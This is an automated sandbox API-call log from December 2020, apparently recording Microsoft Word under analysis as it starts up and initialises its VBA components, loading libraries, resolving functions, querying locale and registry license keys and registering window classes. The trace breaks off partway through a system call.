# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 24.12.2020 07:35:42.820 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\winword.exe" page_root = "0x5681a000" os_pid = "0x1374" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x7e0" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000110fb" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x500 Thread: id = 2 os_tid = 0x648 Thread: id = 3 os_tid = 0xf1c Thread: id = 4 os_tid = 0x4ac Thread: id = 5 os_tid = 0x354 Thread: id = 6 os_tid = 0x4ec Thread: id = 7 os_tid = 0x56c Thread: id = 8 os_tid = 0x36c Thread: id = 9 os_tid = 0x1124 Thread: id = 10 os_tid = 0x1118 Thread: id = 11 os_tid = 0x109c Thread: id = 12 os_tid = 0x10a0 Thread: id = 13 os_tid = 0x10a4 Thread: id = 14 os_tid = 0x1080 Thread: id = 15 os_tid = 0x1070 Thread: id = 16 os_tid = 0x105c Thread: id = 17 os_tid = 0x1048 Thread: id = 18 os_tid = 0x100c Thread: id = 19 os_tid = 0xe94 Thread: id = 20 os_tid = 0x13fc Thread: id = 21 os_tid = 0x13f8 Thread: id = 22 os_tid = 0x13f4 Thread: id = 23 os_tid = 0x13f0 Thread: id = 24 os_tid = 0x13ec Thread: id = 25 os_tid = 0x13e8 Thread: id = 26 os_tid = 0x1378 [0056.489] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33e4fafdb0 | out: lpSystemTimeAsFileTime=0x33e4fafdb0*(dwLowDateTime=0x8340cb7a, dwHighDateTime=0x1d6d9c7)) [0056.489] GetCurrentProcessId () returned 0x1374 [0056.489] GetCurrentThreadId () returned 0x1378 [0056.489] GetTickCount () returned 0x1150943 [0056.489] QueryPerformanceCounter (in: lpPerformanceCount=0x33e4fafdb8 | out: lpPerformanceCount=0x33e4fafdb8*=15587200081) returned 1 [0056.493] __dllonexit () returned 0x7ffc3c4e761800 [0056.494] __dllonexit () returned 0x7ffc3c4e6b0c00 [0056.496] __dllonexit () returned 0x7ffc3c4e666000 [0056.497] __dllonexit () returned 0x7ffc3c4e663800 [0056.497] __dllonexit () returned 0x7ffc3c4e66b800 [0056.499] __dllonexit () returned 0x7ffc3c4e669800 [0056.499] __dllonexit () returned 0x7ffc3c4e66f800 [0056.499] __dllonexit () returned 0x7ffc3c4e66d800 [0056.500] __dllonexit () returned 0x7ffc3c4e653800 [0056.501] __dllonexit () returned 0x7ffc3c4e651800 [0056.501] __dllonexit () returned 0x7ffc3c4e657800 [0056.501] __dllonexit () returned 0x7ffc3c4e655800 [0056.502] __dllonexit () returned 0x7ffc3c4e65b800 [0056.502] __dllonexit () returned 0x7ffc3c4e659800 [0056.503] __dllonexit () returned 0x7ffc3c4e65f800 [0056.503] __dllonexit () returned 0x7ffc3c4e65d800 [0056.503] __dllonexit () returned 0x7ffc3c4e643800 [0056.504] __dllonexit () returned 0x7ffc3c4e11e400 [0056.504] __dllonexit () returned 0x7ffc3c4e766800 [0056.505] __dllonexit () returned 0x7ffc3c4e100800 [0056.505] __dllonexit () returned 0x7ffc3c4e765400 [0056.506] __dllonexit () returned 0x7ffc3c4e76a800 [0056.506] __dllonexit () returned 0x7ffc3c4e768800 [0056.506] __dllonexit () returned 0x7ffc3c4e76d800 [0056.506] __dllonexit () returned 0x7ffc3c4e752800 [0056.507] __dllonexit () returned 0x7ffc3c4e751400 [0056.507] DisableThreadLibraryCalls (hLibModule=0x7ffce0820000) returned 1 [0056.508] GetVersion () returned 0x3ad7000a [0056.508] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0056.508] GetUserDefaultLCID () returned 0x412 [0056.508] CompareStringW (Locale=0x412, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0056.508] GetSystemMetrics (nIndex=5) returned 1 [0056.508] GetSystemMetrics (nIndex=6) returned 1 [0056.508] GetSystemMetrics (nIndex=11) returned 32 [0056.508] GetSystemMetrics (nIndex=12) returned 32 [0056.508] GetSystemMetrics (nIndex=34) returned 136 [0056.508] GetSystemMetrics (nIndex=35) returned 39 [0056.508] GetSystemMetrics (nIndex=0) returned 1440 [0056.508] GetSystemMetrics (nIndex=1) returned 900 [0056.508] GetSystemMetrics (nIndex=32) returned 4 [0056.508] GetSystemMetrics (nIndex=33) returned 4 [0056.508] GetSystemMetrics (nIndex=4) returned 23 [0056.508] GetSystemMetrics (nIndex=42) returned 0 [0056.508] GetStockObject (i=15) returned 0x88000b [0056.508] GetStockObject (i=7) returned 0xb00017 [0056.508] GetStockObject (i=6) returned 0xb00018 [0056.508] GetStockObject (i=8) returned 0xb00016 [0056.508] GetStockObject (i=4) returned 0x900011 [0056.508] GetStockObject (i=2) returned 0x900012 [0056.508] GetStockObject (i=0) returned 0x900010 [0056.508] GetStockObject (i=5) returned 0x900015 [0056.508] GetStockObject (i=13) returned 0x8a01c2 [0056.508] GetDC (hWnd=0x0) returned 0x20108f0 [0056.508] GetDeviceCaps (hdc=0x20108f0, index=14) returned 1 [0056.508] GetDeviceCaps (hdc=0x20108f0, index=12) returned 32 [0056.508] GetDeviceCaps (hdc=0x20108f0, index=38) returned 32409 [0056.508] ReleaseDC (hWnd=0x0, hDC=0x20108f0) returned 1 [0056.508] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x7ffce0bfe048 | out: ppMalloc=0x7ffce0bfe048*=0x7ffd098ff3f0) returned 0x0 [0057.416] malloc (_Size=0x140) returned 0x1d39bde1940 [0057.417] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff688e30000 [0057.417] QueryActCtxW (in: dwFlags=0x80000010, hActCtx=0x7ffce0bffeb8, pvSubInstance=0x0, ulInfoClass=0x1, pvBuffer=0x33e4fb4dd0, cbBuffer=0x10, pcbWrittenOrRequired=0x0 | out: pvBuffer=0x33e4fb4dd0, pcbWrittenOrRequired=0x0) returned 1 [0057.417] ActivateActCtx (in: hActCtx=0x1d3984eaab8, lpCookie=0x33e4fb4dc0 | out: hActCtx=0x1d3984eaab8, lpCookie=0x33e4fb4dc0) returned 1 [0057.417] FindActCtxSectionStringW (in: dwFlags=0x0, lpExtensionGuid=0x0, ulSectionId=0x2, lpStringToFind="Comctl32.dll", ReturnedData=0x33e4fb4de0 | out: ReturnedData=0x33e4fb4de0) returned 1 [0057.417] LoadLibraryW (lpLibFileName="Comctl32.dll") returned 0x7ffcff4a0000 [0057.418] DeactivateActCtx (dwFlags=0x0, ulCookie=0x100212a30000017b) returned 1 [0057.418] RegisterClassA (lpWndClass=0x33e4fb5110) returned 0xc1f8 [0057.419] DeactivateActCtx (dwFlags=0x0, ulCookie=0x100212a30000017c) returned 1 [0057.420] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0057.420] SetCursor (hCursor=0x10007) returned 0x10007 [0057.420] _set_invalid_parameter_handler (_Handler=0x7ffce082dd8c) returned 0x0 [0057.420] wcscpy_s (in: _Destination=0x1d398543858, _SizeInWords=0xb, _Source="7.1\\" | out: _Destination="7.1\\") returned 0x0 [0057.420] wcscpy_s (in: _Destination=0x1d398543860, _SizeInWords=0x7, _Source="Common" | out: _Destination="Common") returned 0x0 [0057.420] GetACP () returned 0x4e4 [0057.420] malloc (_Size=0x7e) returned 0x1d39bde1a90 [0057.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word 문서 (*.docm;*.dotm;*.doc;*.dot)", cchWideChar=63, lpMultiByteStr=0x1d39bde1a90, cbMultiByte=126, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word ?? (*.docm;*.dotm;*.doc;*.dot)", lpUsedDefaultChar=0x0) returned 63 [0057.422] GetDC (hWnd=0x0) returned 0x2010473 [0057.422] GetDeviceCaps (hdc=0x2010473, index=88) returned 96 [0057.422] GetDeviceCaps (hdc=0x2010473, index=90) returned 96 [0057.422] MulDiv (nNumber=96, nNumerator=100, nDenominator=96) returned 100 [0057.422] MulDiv (nNumber=96, nNumerator=100, nDenominator=96) returned 100 [0057.422] ReleaseDC (hWnd=0x0, hDC=0x2010473) returned 1 [0057.424] GetModuleHandleExA (in: dwFlags=0x0, lpModuleName="MSI.DLL", phModule=0x7ffce0c06ba0 | out: phModule=0x7ffce0c06ba0*=0x7ffcf70a0000) returned 1 [0057.424] GetProcAddress (hModule=0x7ffcf70a0000, lpProcName="MsiProvideQualifiedComponentA") returned 0x7ffcf71665b0 [0057.425] GetProcAddress (hModule=0x7ffcf70a0000, lpProcName="MsiGetProductCodeA") returned 0x7ffcf715c070 [0057.425] GetProcAddress (hModule=0x7ffcf70a0000, lpProcName="MsiReinstallFeatureA") returned 0x7ffcf7168a00 [0057.426] GetProcAddress (hModule=0x7ffcf70a0000, lpProcName="MsiProvideComponentA") returned 0x7ffcf7165a10 [0057.428] SysStringLen (param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x43 [0057.428] SysStringLen (param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x43 [0057.428] lstrcpyW (in: lpString1=0x33e4fb4e90, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" [0057.429] GetModuleHandleA (lpModuleName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x0 [0057.431] LoadLibraryExA (lpLibFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", hFile=0x0, dwFlags=0x8) returned 0x7ffce0560000 [0058.610] DeactivateActCtx (dwFlags=0x0, ulCookie=0x100212a30000017d) returned 1 [0058.610] GetLastError () returned 0x0 [0058.610] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoVBADigSigCallDlg") returned 0x7ffce065f500 [0058.611] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoVbaInitSecurity") returned 0x7ffce05d46c0 [0058.611] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFIEPolicyAndVersion") returned 0x7ffce0581290 [0058.612] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFAnsiCodePageSupportsLCID") returned 0x7ffce05d4570 [0058.612] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFInitOffice") returned 0x7ffce057eac0 [0058.612] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoUninitOffice") returned 0x7ffce056efe0 [0058.613] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFGetFontSettings") returned 0x7ffce0564260 [0058.613] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoRgchToRgwch") returned 0x7ffce0572d40 [0058.613] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoHrSimpleQueryInterface") returned 0x7ffce0567e30 [0058.614] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoHrSimpleQueryInterface2") returned 0x7ffce0567dd0 [0058.614] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFCreateControl") returned 0x7ffce05689a0 [0058.615] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFLongLoad") returned 0x7ffce069bea0 [0058.615] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFLongSave") returned 0x7ffce069bee0 [0058.615] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFGetTooltips") returned 0x7ffce05728c0 [0058.616] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFSetTooltips") returned 0x7ffce05d4970 [0058.617] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFLoadToolbarSet") returned 0x7ffce05c3140 [0058.618] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFCreateToolbarSet") returned 0x7ffce05656c0 [0058.619] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoHpalOffice") returned 0x7ffce0570d10 [0058.619] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFWndProcNeeded") returned 0x7ffce0563f40 [0058.619] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFWndProc") returned 0x7ffce0566ed0 [0058.620] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFCreateITFCHwnd") returned 0x7ffce0563f70 [0058.620] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoDestroyITFC") returned 0x7ffce056ee30 [0058.620] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFPitbsFromHwndAndMsg") returned 0x7ffce056e5b0 [0058.621] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFGetComponentManager") returned 0x7ffce0567ea0 [0058.621] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoMultiByteToWideChar") returned 0x7ffce05707d0 [0058.621] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoWideCharToMultiByte") returned 0x7ffce0568dd0 [0058.622] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoHrRegisterAll") returned 0x7ffce065f390 [0058.622] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFSetComponentManager") returned 0x7ffce0574890 [0058.623] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFCreateStdComponentManager") returned 0x7ffce0564050 [0058.623] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFHandledMessageNeeded") returned 0x7ffce056adc0 [0058.623] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoPeekMessage") returned 0x7ffce056aa00 [0058.624] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFCreateIPref") returned 0x7ffce05617f0 [0058.624] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoDestroyIPref") returned 0x7ffce056ef30 [0058.625] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoChsFromLid") returned 0x7ffce05615d0 [0058.625] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoCpgFromChs") returned 0x7ffce0566810 [0058.625] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoSetLocale") returned 0x7ffce05617d0 [0058.626] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoFSetHMsoinstOfSdm") returned 0x7ffce0564000 [0058.626] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoSetVbaInterfaces") returned 0x7ffce0663230 [0058.627] GetProcAddress (hModule=0x7ffce0560000, lpProcName="MsoGetControlInstanceId") returned 0x7ffce0634de0 [0058.627] GetProcAddress (hModule=0x7ffce0560000, lpProcName="VbeuiFIsEdpEnabled") returned 0x7ffce06a2eb0 [0058.627] GetProcAddress (hModule=0x7ffce0560000, lpProcName="VbeuiEnterpriseProtect") returned 0x7ffce06a2f70 [0058.629] malloc (_Size=0x48) returned 0x1d39bde1b20 [0058.630] RegisterClipboardFormatA (lpszFormat="VBM_FHwndIsHctl") returned 0xc1f9 [0058.630] lstrlenA (lpString="") returned 0 [0058.630] malloc (_Size=0x1) returned 0x1d39bde1b70 [0058.630] lstrcpyA (in: lpString1=0x1d39bde1b70, lpString2="" | out: lpString1="") returned="" [0058.630] GetEnvironmentVariableA (in: lpName="DDRYBUR", lpBuffer=0x33e4fb4e70, nSize=0x118 | out: lpBuffer="") returned 0x0 [0058.630] SetErrorMode (uMode=0x8001) returned 0x8001 [0058.630] GetModuleFileNameA (in: hModule=0x7ffce0820000, lpFilename=0x33e4fb4b80, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0058.630] lstrcpyA (in: lpString1=0x33e4fb4a70, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0058.630] lstrcpyA (in: lpString1=0x33e4fb4a70, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0058.630] lstrcpyA (in: lpString1=0x33e4fb4a70, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0058.630] lstrcpyA (in: lpString1=0x33e4fb4a70, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0058.630] lstrcpyA (in: lpString1=0x33e4fb4a70, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0058.630] lstrcpyA (in: lpString1=0x33e4fb4a70, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0058.630] strcpy_s (in: _Dst=0x33e4fb4c90, _DstSize=0x200, _Src="VBE7INTL.DLL" | out: _Dst="VBE7INTL.DLL") returned 0x0 [0058.630] _ultoa_s (in: _Val=0x412, _DstBuf=0x33e4fb47f0, _Size=0x6, _Radix=10 | out: _DstBuf="1042") returned 0x0 [0058.630] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\", _SizeInBytes=0x104, _Source="1042" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1042") returned 0x0 [0058.630] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1042", _SizeInBytes=0x104, _Source="\\" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1042\\") returned 0x0 [0058.631] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1042\\", _SizeInBytes=0x104, _Source="VBE7INTL.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1042\\VBE7INTL.DLL") returned 0x0 [0058.631] lstrlenA (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1042\\VBE7INTL.DLL") returned 75 [0058.631] CharToOemBuffA (in: lpszSrc="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1042\\VBE7INTL.DLL", lpszDst=0x33e4fb46a0, cchDstLength=0x4c | out: lpszDst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1042\\VBE7INTL.DLL") returned 1 [0058.631] _access_s (_FileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1042\\VBE7INTL.DLL", _AccessMode=0) returned 0x0 [0058.632] strcpy_s (in: _Dst=0x33e4fb4920, _DstSize=0x104, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1042\\VBE7INTL.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1042\\VBE7INTL.DLL") returned 0x0 [0058.633] LoadLibraryA (lpLibFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1042\\VBE7INTL.DLL") returned 0x1d39bed0000 [0058.640] DeactivateActCtx (dwFlags=0x0, ulCookie=0x100212a30000017e) returned 1 [0058.640] GetSystemDefaultLCID () returned 0x409 [0058.640] GetUserDefaultLCID () returned 0x412 [0058.640] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x33e4fb4fb0, cchData=2 | out: lpLCData=".") returned 2 [0058.641] GetStockObject (i=13) returned 0x8a01c2 [0058.641] GetObjectA (in: h=0x8a01c2, c=60, pv=0x33e4fb4f50 | out: pv=0x33e4fb4f50) returned 60 [0058.641] lstrcpyA (in: lpString1=0x7ffce0c07260, lpString2="Vbui6.chm" | out: lpString1="Vbui6.chm") returned="Vbui6.chm" [0058.641] lstrcpyA (in: lpString1=0x7ffce0c07370, lpString2="VbLR6.chm" | out: lpString1="VbLR6.chm") returned="VbLR6.chm" [0058.641] GetModuleFileNameA (in: hModule=0x7ffce0820000, lpFilename=0x33e4fb4ff0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0058.642] lstrlenA (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 66 [0058.642] malloc (_Size=0x43) returned 0x1d39bde1b90 [0058.642] malloc (_Size=0x43) returned 0x1d39bde3790 [0058.642] lstrcpyA (in: lpString1=0x1d39bde1b90, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" [0058.642] GetCurrentDirectoryA (in: nBufferLength=0x104, lpBuffer=0x33e4fb4e80 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0058.642] strnlen (_Str="C:\\Users\\FD1HVy\\Documents", _MaxCount=0x7fffffff) returned 0x19 [0058.642] malloc (_Size=0x1a) returned 0x1d39bde1be0 [0058.642] malloc (_Size=0x1a) returned 0x1d39bde37e0 [0058.642] lstrcpynA (in: lpString1=0x1d39bde1be0, lpString2="C:\\Users\\FD1HVy\\Documents", iMaxLength=26 | out: lpString1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0058.643] GetVersionExA (in: lpVersionInformation=0x33e4fb4ee0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x1, dwBuildNumber=0x0, dwPlatformId=0x43, szCSDVersion="") | out: lpVersionInformation=0x33e4fb4ee0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x3ad7, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0058.643] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="Licenses", phkResult=0x33e4fb4e08 | out: phkResult=0x33e4fb4e08*=0x11ea) returned 0x0 [0058.643] strcpy_s (in: _Dst=0x33e4fb4e10, _DstSize=0x80, _Src="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Dst="8804558B-B773-11d1-BC3E-0000F87552E7") returned 0x0 [0058.643] strcpy_s (in: _Dst=0x33e4fb4e90, _DstSize=0xc8, _Src="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Dst="8804558B-B773-11d1-BC3E-0000F87552E7") returned 0x0 [0058.643] _strrev (in: _Str="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Str="7E25578F0000-E3CB-1d11-377B-B8554088") returned="7E25578F0000-E3CB-1d11-377B-B8554088" [0058.643] RegQueryValueA (in: hKey=0x11ea, lpSubKey="8804558B-B773-11d1-BC3E-0000F87552E7", lpData=0x33e4fb4e90, lpcbData=0x33e4fb4e00 | out: lpData="\x0f}\x02\x01", lpcbData=0x33e4fb4e00) returned 0x2 [0058.643] RegCloseKey (hKey=0x11ea) returned 0x0 [0058.643] OleInitialize (pvReserved=0x0) returned 0x1 [0058.643] OaBuildVersion () returned 0x321396 [0058.643] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x7ffd09590000 [0058.644] DeactivateActCtx (dwFlags=0x0, ulCookie=0x100212a30000017f) returned 1 [0058.644] GetLastError () returned 0x0 [0058.644] GetProcAddress (hModule=0x7ffd09590000, lpProcName="SysFreeString") returned 0x7ffd0959cea0 [0058.645] GetProcAddress (hModule=0x7ffd09590000, lpProcName="LoadTypeLib") returned 0x7ffd095a79a0 [0058.645] GetProcAddress (hModule=0x7ffd09590000, lpProcName="RegisterTypeLib") returned 0x7ffd095c5590 [0058.645] GetProcAddress (hModule=0x7ffd09590000, lpProcName="QueryPathOfRegTypeLib") returned 0x7ffd095c5470 [0058.646] GetProcAddress (hModule=0x7ffd09590000, lpProcName="UnRegisterTypeLib") returned 0x7ffd095c4020 [0058.646] GetProcAddress (hModule=0x7ffd09590000, lpProcName="OleTranslateColor") returned 0x7ffd095a79b0 [0058.647] GetProcAddress (hModule=0x7ffd09590000, lpProcName="OleCreateFontIndirect") returned 0x7ffd09591bb0 [0058.647] GetProcAddress (hModule=0x7ffd09590000, lpProcName="OleCreatePictureIndirect") returned 0x7ffd09591c00 [0058.647] GetProcAddress (hModule=0x7ffd09590000, lpProcName="OleLoadPicture") returned 0x7ffd095f13e0 [0058.648] GetProcAddress (hModule=0x7ffd09590000, lpProcName="OleCreatePropertyFrameIndirect") returned 0x7ffd095f1350 [0058.648] GetProcAddress (hModule=0x7ffd09590000, lpProcName="OleCreatePropertyFrame") returned 0x7ffd095f12f0 [0058.648] GetProcAddress (hModule=0x7ffd09590000, lpProcName="OleIconToCursor") returned 0x7ffd095f1390 [0058.649] GetProcAddress (hModule=0x7ffd09590000, lpProcName="LoadTypeLibEx") returned 0x7ffd095a03c0 [0058.649] GetProcAddress (hModule=0x7ffd09590000, lpProcName="OleLoadPictureEx") returned 0x7ffd095f1410 [0058.649] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0058.649] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0058.649] GetClassInfoA (in: hInstance=0x7ffce0820000, lpClassName="VBBubble", lpWndClass=0x33e4fb4f40 | out: lpWndClass=0x33e4fb4f40) returned 0 [0058.649] RegisterClassA (lpWndClass=0x33e4fb4f40) returned 0xc1fa [0058.650] DeactivateActCtx (dwFlags=0x0, ulCookie=0x100212a300000180) returned 1 [0058.650] LHashValOfNameSysA (syskind=0x1, lcid=0x412, szName="Count") returned 0x507630 [0058.650] LHashValOfNameSysA (syskind=0x1, lcid=0x412, szName="_Default") returned 0x50c26a [0058.650] LHashValOfNameSysA (syskind=0x1, lcid=0x412, szName="Item") returned 0x507ad7 [0058.650] LHashValOfNameSysA (syskind=0x1, lcid=0x412, szName="Add") returned 0x5072f7 [0058.650] LHashValOfNameSysA (syskind=0x1, lcid=0x412, szName="Remove") returned 0x50b1cf [0058.650] GlobalAddAtomA (lpString="VBDisabled") returned 0xc10a [0058.650] malloc (_Size=0x90) returned 0x1d39bde3810 [0058.651] RegisterClassExA (param_1=0x33e4fb5060) returned 0xc1fb [0058.651] DeactivateActCtx (dwFlags=0x0, ulCookie=0x100212a300000181) returned 1 [0058.651] SetThreadDpiAwarenessContext () returned 0x80000011 [0058.652] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderMain", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x7ffce0820000, lpParam=0x0) returned 0x60040 [0058.653] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x81, wParam=0x0, lParam=0x33e4fb4980) returned 0x1 [0058.653] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x83, wParam=0x0, lParam=0x33e4fb49e0) returned 0x0 [0058.653] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x1, wParam=0x0, lParam=0x33e4fb4980) returned 0x0 [0058.654] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0058.654] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0058.654] DeactivateActCtx (dwFlags=0x0, ulCookie=0x100212a300000182) returned 1 [0058.654] SetThreadDpiAwarenessContext () returned 0x11 [0058.654] GetVersionExA (in: 